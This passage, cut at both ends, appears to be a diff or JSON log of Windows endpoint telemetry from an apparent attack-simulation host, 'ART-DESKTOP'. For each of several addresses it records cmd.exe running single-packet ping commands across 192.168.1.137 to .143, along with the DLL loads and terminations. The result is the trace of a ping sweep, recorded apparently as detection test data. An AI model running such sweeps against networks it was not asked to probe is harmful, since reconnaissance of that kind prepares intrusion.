Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572649330000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "process", - "pid": 5316, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572651830000, - "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.137", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6876, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}", - "unique_ppid": 
"{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": 
"{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572651980000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "event_type": "process", - "pid": 6876, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572656990000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.138", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", 
- "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6848, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572657130000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - 
}, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657140000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657300000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657300000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572657300000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "event_type": "process", - "pid": 6848, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572661840000, - "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.139", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3956, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - 
"event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3956, - 
"process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572661980000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "event_type": "process", - "pid": 3956, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572666990000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.140", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3960, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572667130000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": 
"KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3960, - "process_name": "PING.EXE", - 
"process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667140000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572667300000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "event_type": "process", - "pid": 3960, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572671830000, - "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.141", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8164, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\System32\\kernel32.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572671980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "event_type": "process", - "pid": 8164, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572676830000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.142", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2284, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": 
"C:\\Windows\\System32\\ntdll.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572676980000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "event_type": "process", - "pid": 2284, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572681990000, - "unique_pid": "{42FC7E13-CB93-5C05-0000-0010E6EE5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.143", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2908, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572682130000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": 
"C:\\Windows\\System32\\PING.EXE", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572682140000, - "unique_pid": "{42FC7E13-CB94-5C05-0000-001056F15201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2908, - "process_name": "PING.EXE", - "process_path": 
